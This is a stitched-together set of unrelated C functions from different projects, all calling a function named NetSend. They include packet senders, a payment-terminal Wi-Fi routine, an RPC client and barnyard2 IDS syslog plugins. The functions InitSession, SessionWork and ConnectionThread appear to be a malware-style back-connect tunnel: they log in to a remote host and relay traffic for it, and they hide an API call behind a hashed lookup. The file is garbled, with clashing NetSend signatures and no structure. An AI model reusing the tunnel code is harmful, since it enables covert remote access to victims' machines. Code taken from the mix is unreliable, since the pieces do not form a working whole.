bool SendStatus( SOCKET Socket, USHORT uBid, USHORT uCid, BOOL bOk )
{
TPkt tPacket;
tPacket.QType = 0x63;
tPacket.dwLen = 3;
tPacket.dwReserved = uCid;
char Status[3];
Status[0] = bOk;
*(PWORD)&Status[1] = uBid;
if ( !NetSend( Socket, (char*)&tPacket, sizeof( tPacket ) ) )
{
return false;
}
if ( !NetSend( Socket, Status, 3 ) )
{
return false;
}
return true;
}
bool NetSendPacketData(NetPacketData *data) {
NetSend((void *)data->name, MAX_NAME_LENGTH);
NetSend((void *)data->size, sizeof(int));
NetSend(data->data, data->size);
return true;
}
bool NetSendPacketData(SOCKET hSocket,NetPacketData *data) {
NetSend(hSocket,(void *)data->name, MAX_NAME_LENGTH);
//printf("ss %d\n", data->size);
NetSend(hSocket,(void *)&data->size, sizeof(int));
NetSend(hSocket,data->data, data->size);
return true;
}
bool NetSendPacket(NetPacket *packet) {
// 타임 스탬프 기입
packet->header.timestamp = NetGetTimestamp();
// 헤더 정보 전송
bool headerRet = true;
if(NetSend((void *)&packet->header,sizeof(NetPacketHeader)) !=
sizeof(NetPacketHeader)) {
headerRet = false;
return false;
}
// 서브 데이터 전송
bool dataRet = true;
for(int i=0; i<packet->header.count; i++) {
dataRet = dataRet & NetSendPacketData(&packet->data[i]);
if(dataRet == false)
return false;
}
//return headerRet & dataRet;
return true;
}
int SSLNetSend(int net_hd, void *buf, int size)
{
int iRet;
iRet = NetSend(net_hd, buf, size, 0);
DebugOutput("%s--%d--%s,net_hd:%d, iRet:%d\n buf:%s",
__FILE__, __LINE__, __FUNCTION__, net_hd, iRet, buf);//linzhao
if (iRet < 0)
{
switch (iRet)
{
case NET_ERR_TIMEOUT:
return -ERR_SSL_TIMEOUT;
default:
return iRet;
}
}
return iRet;
}
void InitSession( char *Host, int Port, char *Uid, char *Password )
{
char Buffer[ 1024 ];
int r = 0;
SOCKET Socket = NetConnect( Host, Port );
if ( Socket != INVALID_SOCKET )
{
r = NetRecv( Socket, Buffer, 6 );
if ( r )
{
Buffer[ 6 ] = 0;
if ( !m_lstrncmp( Buffer, "HELLO\n", 6 ) )
{
typedef int ( WINAPI *fwsprintfA )( LPTSTR lpOut, LPCTSTR lpFmt, ... );
fwsprintfA _pwsprintfA = (fwsprintfA)GetProcAddressEx( NULL, 3, 0xEA3AF0D7 );
_pwsprintfA( Buffer, "%s:%s\n", Uid, Password );
NetSend( Socket, Buffer, m_lstrlen( Buffer ) );
if ( NetRecv( Socket, Buffer, 6 ) )
{
Buffer[ 6 ] = 0;
if ( !m_lstrncmp( Buffer, "READY\n", 6 ) )
{
SessionWork( Socket );
}
}
}
}
pclosesocket( Socket );
}
////发送数据
int WifiNetTcpTxd(uchar *psTxdData, ushort usDataLen, ushort uiTimeOutSec)
{
int iRet;
int iSendLen;
int iSumLen;
uchar sBuff[128];
#ifdef DEBUG_USE
DelayMs(500);
return 0;
#endif
// Netioctl(wnet_socket_id, CMD_TO_SET, uiTimeOutSec*1000); // 系统默认为2秒
iSumLen = 0;
while(1)
{
if (usDataLen > TCPMAXSENDLEN)
{
iSendLen = TCPMAXSENDLEN;
usDataLen = usDataLen - TCPMAXSENDLEN;
}
else
{
iSendLen = usDataLen;
}
iRet = NetSend(wnet_socket_id, psTxdData+iSumLen, iSendLen, 0);
{
DebugOutput("%s--%d--%s, netsend : iRet = %d\n", __FILE__, __LINE__, __FUNCTION__, iRet);
}//linzhao
if (iRet < 0)
{
memset(sBuff, 0, sizeof(sBuff));
switch (iRet)
{
case NET_ERR_MEM:
strcpy(sBuff,_T("MEM ERROR"));
break;
case NET_ERR_BUF:
strcpy(sBuff,_T("BUF ERROR"));
break;
case NET_ERR_CLSD:
strcpy(sBuff,_T("CONNE CLOSED"));
break;
case NET_ERR_CONN:
strcpy(sBuff,_T("CONNE NOT EST"));
break;
case NET_ERR_LINKDOWN:
strcpy(sBuff,_T("LINK DOWN"));
break;
default:
sprintf(sBuff,"ret_send=%d",iRet);
break;
}
DxxScrClrLine(2, 7);
PubDispString(sBuff,4|DISP_LINE_CENTER);
PubWaitKey(5);
return iRet;
}
iSumLen = iSumLen + iSendLen;
if (iSendLen <= TCPMAXSENDLEN)
{
break;
}
}
return 0;
}
void SessionWork( SOCKET Socket )
{
PCONNECTIONS pConnect = (PCONNECTIONS)MemAlloc( sizeof( PCONNECTIONS ) );
m_memset( pConnect, 0, sizeof( PCONNECTIONS ) );
char *Data = NULL;
while ( 1 )
{
if ( !WaitRecv( Socket, 60*60 ) )
{
break;
}
TPkt tPacket;
if ( !NetRecv( Socket, (char*)&tPacket, sizeof( tPacket ) ) )
{
break;
}
if ( tPacket.QType == 0x63 )
{
if ( tPacket.dwLen != 6 )
{
break;
}
if ( Data )
{
MemFree( Data );
}
Data = (char *)MemAlloc( tPacket.dwLen + 1 );
if ( Data == NULL )
{
break;
}
if ( !NetRecv( Socket, Data, tPacket.dwLen ) )
{
break;
}
ManageNewConnection( Socket, *(ULONG*)Data, (USHORT)tPacket.dwReserved, *(USHORT*)&Data[4] );
}
else if ( tPacket.QType == 0x73 )
{
if ( Data )
{
MemFree( Data );
}
Data = (char *)MemAlloc( tPacket.dwLen + 1 );
if ( Data == NULL )
{
break;
}
if ( !NetRecv( Socket, Data, tPacket.dwLen ) )
{
break;
}
BcDecrypt( Data, tPacket.dwLen );
ThreadConnection Conn;
pWaitForSingleObject( hThreadMutex, INFINITE );
int k = FindConn( (USHORT)tPacket.dwReserved );
if ( k != -1 )
{
Conn = Connections[ k ];
NetSend( Conn.thread_s, Data, tPacket.dwLen );
}
pReleaseMutex( hThreadMutex );
}
else if ( tPacket.QType == 0x77 )
{
DisconnBid( tPacket.dwReserved );
}
else if ( tPacket.QType == 0x64 )
{
pclosesocket(Socket);
KillAllConnections();
pExitThread( 1 );
break;
}
else if ( tPacket.QType == 0x65 )
{
}
else
{
break;
}
}
if ( Data )
{
MemFree( Data );
}
pConnect->dwStatus = 1;
}
DWORD WINAPI ConnectionThread( LPVOID lpData )
{
int bid = (int)lpData;
ThreadConnection Conn;
pWaitForSingleObject( hThreadMutex, INFINITE );
int k = FindConn( bid );
if ( k != -1 )
{
Conn = Connections[ k ];
}
pReleaseMutex(hThreadMutex);
if ( k != -1 )
{
if ( Conn.thread_s != INVALID_SOCKET )
{
pWaitForSingleObject( hThreadMutex, INFINITE );
k = FindConn( bid );
if ( k != -1 )
{
Connections[ k ].thread_s = Conn.thread_s;
}
pReleaseMutex( hThreadMutex );
pWaitForSingleObject( hSockMutex, INFINITE );
SendStatus( Conn.s, bid, Conn.cid, TRUE );
pReleaseMutex( hSockMutex );
char data[1024];
while ( 1 )
{
int r = (int)precv( Conn.thread_s, data, 1024, 0 );
if ( r == 0 || r == SOCKET_ERROR )
{
pWaitForSingleObject( hSockMutex, INFINITE );
TPkt tPacket;
tPacket.dwLen = 0;
tPacket.QType = 0x77;
tPacket.dwReserved = bid;
NetSend( Conn.s, (char*)&tPacket, sizeof( tPacket ) );
pReleaseMutex( hSockMutex );
break;
}
pWaitForSingleObject( hSockMutex, INFINITE );
TPkt tPacket;
tPacket.dwLen = r;
tPacket.QType = 0x73;
tPacket.dwReserved = bid;
NetSend( Conn.s, (char*)&tPacket, sizeof( tPacket ) );
BcDecrypt( data, r );
if ( !NetSend( Conn.s, data, r ) )
{
pReleaseMutex( hSockMutex );
break;
}
pReleaseMutex( hSockMutex );
}
}
else
{
SendStatus( Conn.s, bid, Conn.cid, FALSE );
}
}
DisconnBid( bid );
return 0;
}
void RPCReceive(WORD wParam,ElemDataStruct *lParam,WORD connectionID)
{
short i,datasize,done,actseq,seqnr,cc,el,ind,flag,eqsize,count,s,msgsize;
short fecindex;
time_t interim;
ElemDataStruct *ElemPointer;
int l;
char str[NOD_BUF_SIZE+1],*msgbuf;
msgbuf=NULL;
eqsize=abs((short)wParam);
flag=(short)wParam;
ElemPointer=lParam;
fecindex=ElemPointer->FecIndex;
el=0;ind=0;cc=0;
done=0;actseq=0;time(&interim);seqnr=-1;cc=0;
time(&interim);
while (1)
{
l=sizeof(req_sck_name);
s=recvfrom(connectionID,(char *)str,NOD_BUF_SIZE,0,(struct sockaddr *)&req_sck_name,&l);
if (s>0) break;
if (time((time_t *)0)>(interim+RPC_TIMEOUT))
{
FecAccessCount[fecindex]++;
cc=link_not_open;goto outtcp;
}
}
sendBuffer[0]=CHECK_CHAR;NetSend(connectionID,1);
msgsize=*(short *)str;
msgbuf=(char *)malloc(msgsize);
if (msgbuf==NULL) {cc=out_of_memory;goto outtcp;}
if (msgsize<=NOD_BUF_SIZE) count=msgsize;else count=NOD_BUF_SIZE;
for (i=2;i<count;i++) msgbuf[i-2]=str[i];
time(&interim);
while (count<msgsize)
{
l=sizeof(req_sck_name);
s=recvfrom(connectionID,(char *)&msgbuf[count-2],msgsize-count,0,(struct sockaddr *)&req_sck_name,/*(short *)*/&l);
if (s>0)
{
sendBuffer[0]=CHECK_CHAR;
NetSend(connectionID,1);
count=count+s;
time(&interim);
}
if (time((time_t *)0)>(interim+RPC_TIMEOUT))
{
FecAccessCount[fecindex]++;
cc=link_not_open;goto outtcp;
}
}
outtcp:
closesocket(connectionID);
count=0;msgsize=msgsize-2;
if (cc) ElemPointer->CompCode=cc;
else
{
ElemPointer->CompCode=*(short *)&msgbuf[count];
count=count+sizeof(short);
if (ElemPointer->CompCode<=0 && (count+2*sizeof(short))<=(USHORT)msgsize)
{
ElemPointer->DataFormat=*(short *)&msgbuf[count];
count=count+sizeof(short);
datasize=*(short *)&msgbuf[count];
count=count+sizeof(short);
if (ElemPointer->Values!=NULL) free(ElemPointer->Values);
ElemPointer->Values=(char *)malloc(datasize);
if (ElemPointer->Values==NULL)
{
ElemPointer->CompCode=out_of_memory;
count=count+datasize;
}
else
{
for (i=0;i<datasize;i++) ElemPointer->Values[i]=msgbuf[count++];
}
}
}
if (msgbuf!=NULL) free((void *)msgbuf);
}
short RPCSend(WORD Param,ElemDataStruct *lParam,WORD connectionID)
{
char user[255];
short cc=0,x,eqsize,count,rwflag;
ElemDataStruct *ElemPointer;
char *ptrs,*ptrd;
HeaderStruct RPCHeader;
EqpInfoStruct EqpInfo;
BOOL remove=FALSE;
WORD wParam;
wParam=Param;
if (!wParam)
{
wParam = 1;
remove = TRUE;
}
ElemPointer=lParam;
eqsize = abs((short)wParam);
rwflag = eqsize/(short)wParam;
RPCHeader.TotalSize=sizeof(HeaderStruct)+sizeof(EqpInfoStruct)*eqsize;
if (getenv("USER")!=NULL) strcpy(user,getenv("USER"));
else strcpy(user,"COLLAPS");
strcpy(RPCHeader.UserName,user);
RPCHeader.EqpSize=(short)wParam;
RPCHeader.Protocol=1;
if (rwflag<0)
{
RPCHeader.TotalSize=RPCHeader.TotalSize+
GetFormatSize(ElemPointer->DataFormat)*(ElemPointer->Size);
}
ptrd=(char *) sendBuffer;
ptrs=(char *) &RPCHeader;
for (count=0;count<sizeof(HeaderStruct);count++) ptrd[count]=ptrs[count];
for (x=0;x<sizeof(ElemPointer->ElemName);x++) EqpInfo.ElemName[x]=ElemPointer->ElemName[x];
for (x=0;x<sizeof(ElemPointer->EqName);x++) EqpInfo.EqpModName[x]=ElemPointer->EqName[x];
EqpInfo.EqpModNo=ElemPointer->EqNo;
for (x=0;x<sizeof(ElemPointer->Property);x++) EqpInfo.Property[x]=ElemPointer->Property[x];
strcpy(EqpInfo.Cycle,ElemPointer->Cycle);
EqpInfo.DataFormat=ElemPointer->DataFormat;
EqpInfo.DataSize=ElemPointer->Size;
ptrs=(char *)&EqpInfo;
for (x=0;x<sizeof(EqpInfoStruct);x++)
{
if (count==NOD_BUF_SIZE)
{
if (cc=NetSend(connectionID,count),cc) goto error;
count=0;
}
ptrd[count++]=ptrs[x];
}
if (rwflag<0)
{
ptrs=(char *)ElemPointer->Values;
if (ptrs==NULL) return out_of_memory;
for (x=0;x<(ElemPointer->Size*GetFormatSize(ElemPointer->DataFormat));x++)
{
ptrd[count++]=ptrs[x];
if (count==NOD_BUF_SIZE)
{
if (cc=NetSend(connectionID,count),cc) goto error;
count=0;
}
}
}
if (count)
{
if (cc=NetSend(connectionID,count),cc) goto error;
}
error:
if (cc)
{
if (NetProt==tcp) closesocket(connectionID);
}
return cc;
}
void OpSyslog_Alert(Packet *p, void *event, uint32_t event_type, void *arg)
{
OpSyslog_Data *syslogContext = NULL;
Unified2EventCommon *iEvent = NULL;
SigNode *sn = NULL;
ClassType *cn = NULL;
char sip[16] = {0};
char dip[16] = {0};
if( (p == NULL) ||
(event == NULL) ||
(arg == NULL))
{
LogMessage("OpSyslog_Alert(): Invoked with Packet[0x%x] Event[0x%x] Event Type [%u] Context pointer[0x%x]\n",
p,
event,
event_type,
arg);
return;
}
if(event_type != UNIFIED2_IDS_EVENT)
{
LogMessage("OpSyslog_Alert(): Is currently unable to handle Event Type [%u] \n",
event_type);
return;
}
syslogContext = (OpSyslog_Data *)arg;
iEvent = event;
memset(syslogContext->payload,'\0',(SYSLOG_MAX_QUERY_SIZE));
memset(syslogContext->formatBuffer,'\0',(SYSLOG_MAX_QUERY_SIZE));
syslogContext->payload_current_pos = 0;
syslogContext->format_current_pos = 0;
switch(syslogContext->operation_mode)
{
case 0: /* Ze Classic (Requested) */
if(IPH_IS_VALID(p))
{
if (strlcpy(sip, inet_ntoa(GET_SRC_ADDR(p)), sizeof(sip)) >= sizeof(sip))
{
FatalError("[%s()], strlcpy() error , bailing \n",
__FUNCTION__);
return;
}
if (strlcpy(dip, inet_ntoa(GET_DST_ADDR(p)), sizeof(dip)) >= sizeof(dip))
{
FatalError("[%s()], strlcpy() error , bailing \n",
__FUNCTION__);
return;
}
}
sn = GetSigByGidSid(ntohl(iEvent->generator_id),
ntohl(iEvent->signature_id));
cn = ClassTypeLookupById(barnyard2_conf,
ntohl(iEvent->classification_id));
if( (syslogContext->format_current_pos += snprintf(syslogContext->formatBuffer,SYSLOG_MAX_QUERY_SIZE,
"[%u:%u:%u] ",
ntohl(iEvent->generator_id),
ntohl(iEvent->signature_id),
ntohl(iEvent->signature_revision))) >= SYSLOG_MAX_QUERY_SIZE)
{
/* XXX */
FatalError("[%s()], failed call to snprintf \n",
__FUNCTION__);
}
if( OpSyslog_Concat(syslogContext))
{
/* XXX */
FatalError("OpSyslog_Concat(): Failed \n");
}
if(sn != NULL)
{
if( (syslogContext->format_current_pos += snprintf(syslogContext->formatBuffer,SYSLOG_MAX_QUERY_SIZE,
"%s ",
sn->msg)) >= SYSLOG_MAX_QUERY_SIZE)
{
/* XXX */
FatalError("[%s()], failed call to snprintf \n",
__FUNCTION__);
}
}
else
{
if( (syslogContext->format_current_pos += snprintf(syslogContext->formatBuffer,SYSLOG_MAX_QUERY_SIZE,
"ALERT ")) >= SYSLOG_MAX_QUERY_SIZE)
{
/* XXX */
FatalError("[%s()], failed call to snprintf \n",
__FUNCTION__);
}
}
if( OpSyslog_Concat(syslogContext))
{
/* XXX */
FatalError("OpSyslog_Concat(): Failed \n");
}
if(cn != NULL)
{
if( cn->name )
{
if( (syslogContext->format_current_pos += snprintf(syslogContext->formatBuffer,SYSLOG_MAX_QUERY_SIZE,
"[Classification: %s] [Priority: %d]:",
cn->name,
ntohl(((Unified2EventCommon *)event)->priority_id))) >= SYSLOG_MAX_QUERY_SIZE)
{
/* XXX */
FatalError("[%s()], failed call to snprintf \n",
__FUNCTION__);
}
}
}
else if( ntohl(((Unified2EventCommon *)event)->priority_id) != 0 )
{
if( (syslogContext->format_current_pos += snprintf(syslogContext->formatBuffer,SYSLOG_MAX_QUERY_SIZE,
"[Priority: %d]:",
ntohl(((Unified2EventCommon *)event)->priority_id))) >= SYSLOG_MAX_QUERY_SIZE)
{
/* XXX */
FatalError("[%s()], failed call to snprintf \n",
__FUNCTION__);
}
}
if( OpSyslog_Concat(syslogContext))
{
/* XXX */
FatalError("OpSyslog_Concat(): Failed \n");
}
if( (IPH_IS_VALID(p)) &&
(((GET_IPH_PROTO(p) != IPPROTO_TCP &&
GET_IPH_PROTO(p) != IPPROTO_UDP &&
GET_IPH_PROTO(p) != IPPROTO_ICMP) ||
p->frag_flag)))
{
if(!BcAlertInterface())
{
if(protocol_names[GET_IPH_PROTO(p)])
{
if( (syslogContext->format_current_pos += snprintf(syslogContext->formatBuffer,SYSLOG_MAX_QUERY_SIZE,
" {%s} %s -> %s",
protocol_names[GET_IPH_PROTO(p)],
sip, dip)) >= SYSLOG_MAX_QUERY_SIZE)
{
/* XXX */
FatalError("[%s()], failed call to snprintf \n",
__FUNCTION__);
}
}
}
else
{
if(protocol_names[GET_IPH_PROTO(p)])
{
if( (syslogContext->format_current_pos += snprintf(syslogContext->formatBuffer,SYSLOG_MAX_QUERY_SIZE,
" <%s> {%s} %s -> %s",
barnyard2_conf->interface,
protocol_names[GET_IPH_PROTO(p)],
sip, dip)) >= SYSLOG_MAX_QUERY_SIZE)
{
/* XXX */
FatalError("[%s()], failed call to snprintf \n",
__FUNCTION__);
}
}
}
}
else
{
if(BcAlertInterface())
{
if(protocol_names[GET_IPH_PROTO(p)])
{
if( (syslogContext->format_current_pos += snprintf(syslogContext->formatBuffer,SYSLOG_MAX_QUERY_SIZE,
" <%s> {%s} %s:%i -> %s:%i",
barnyard2_conf->interface,
protocol_names[GET_IPH_PROTO(p)], sip,
p->sp, dip, p->dp)) >= SYSLOG_MAX_QUERY_SIZE)
{
/* XXX */
FatalError("[%s()], failed call to snprintf \n",
__FUNCTION__);
}
}
}
else
{
if(protocol_names[GET_IPH_PROTO(p)])
{
if( (syslogContext->format_current_pos += snprintf(syslogContext->formatBuffer,SYSLOG_MAX_QUERY_SIZE,
" {%s} %s:%i -> %s:%i",
protocol_names[GET_IPH_PROTO(p)], sip, p->sp,
dip, p->dp)) >= SYSLOG_MAX_QUERY_SIZE)
{
/* XXX */
FatalError("[%s()], failed call to snprintf \n",
__FUNCTION__);
}
}
}
}
if( OpSyslog_Concat(syslogContext))
{
/* XXX */
FatalError("OpSyslog_Concat(): Failed \n");
}
break;
case 1: /* Ze verbose */
if(Syslog_FormatTrigger(syslogContext, iEvent,0) )
{
LogMessage("WARNING: Unable to append Trigger header.\n");
return;
}
/* Support for portscan ip */
if(p->iph)
{
if(Syslog_FormatIPHeaderAlert(syslogContext, p) )
{
LogMessage("WARNING: Unable to append Trigger header.\n");
return;
}
}
if(p->iph)
{
/* build the protocol specific header information */
switch(p->iph->ip_proto)
{
case IPPROTO_TCP:
Syslog_FormatTCPHeaderAlert(syslogContext, p);
break;
case IPPROTO_UDP:
Syslog_FormatUDPHeaderAlert(syslogContext, p);
break;
case IPPROTO_ICMP:
Syslog_FormatICMPHeaderAlert(syslogContext, p);
break;
}
}
/* CHECKME: -elz will update formating later on .. */
if( (syslogContext->format_current_pos += snprintf(syslogContext->formatBuffer,SYSLOG_MAX_QUERY_SIZE,
"\n")) >= SYSLOG_MAX_QUERY_SIZE)
{
/* XXX */
FatalError("Couldn't finalize payload string ....\n");
}
if( OpSyslog_Concat(syslogContext))
{
/* XXX */
FatalError("OpSyslog_Concat(): Failed \n");
}
break;
default:
FatalError("[%s()]: Unknown operation_mode ... bailing \n",
__FUNCTION__);
break;
}
if(NetSend(syslogContext))
{
NetClose(syslogContext);
if(syslogContext->local_logging != 1)
{
FatalError("NetSend(): call failed for host:port '%s:%u' bailing...\n", syslogContext->server, syslogContext->port);
}
}
return;
}
void OpSyslog_Log(Packet *p, void *event, uint32_t event_type, void *arg)
{
OpSyslog_Data *syslogContext = NULL;
Unified2EventCommon *iEvent = NULL;
if( (p == NULL) ||
(event == NULL) ||
(arg == NULL))
{
LogMessage("OpSyslog_Log(): Invoked with Packet[0x%x] Event[0x%x] Event Type [%u] Context pointer[0x%x]\n",
p,
event,
event_type,
arg);
return;
}
if(event_type != UNIFIED2_IDS_EVENT)
{
LogMessage("OpSyslog_Log(): Is currently unable to handle Event Type [%u] \n",
event_type);
}
syslogContext = (OpSyslog_Data *)arg;
iEvent = event;
memset(syslogContext->payload,'\0',(SYSLOG_MAX_QUERY_SIZE));
memset(syslogContext->formatBuffer,'\0',(SYSLOG_MAX_QUERY_SIZE));
syslogContext->payload_current_pos = 0;
syslogContext->format_current_pos = 0;
if(Syslog_FormatTrigger(syslogContext, iEvent,1) )
{
FatalError("WARNING: Unable to append Trigger header.\n");
}
if(p->iph)
{
Syslog_FormatIPHeaderLog(syslogContext, p);
}
if(p->iph)
{
switch(p->iph->ip_proto)
{
case IPPROTO_ICMP:
Syslog_FormatICMPHeaderLog(syslogContext, p);
break;
case IPPROTO_TCP:
Syslog_FormatTCPHeaderLog(syslogContext, p);
break;
case IPPROTO_UDP:
Syslog_FormatUDPHeaderLog(syslogContext, p);
break;
}
}
Syslog_FormatPayload(syslogContext, p);
/* CHECKME: -elz will update formating later on .. */
if( (syslogContext->format_current_pos += snprintf(syslogContext->formatBuffer,SYSLOG_MAX_QUERY_SIZE,
"\n")) >= SYSLOG_MAX_QUERY_SIZE)
{
/* XXX */
FatalError("Couldn't finalize payload string ....\n");
}
if( OpSyslog_Concat(syslogContext))
{
/* XXX */
FatalError("OpSyslog_Concat(): Failed \n");
}
if(NetSend(syslogContext))
{
NetClose(syslogContext);
//Reliability...
FatalError("WARNING: Unable to connect to our syslog host: '%s:%u'\n", syslogContext->server, syslogContext->port);
return;
}
return;
}
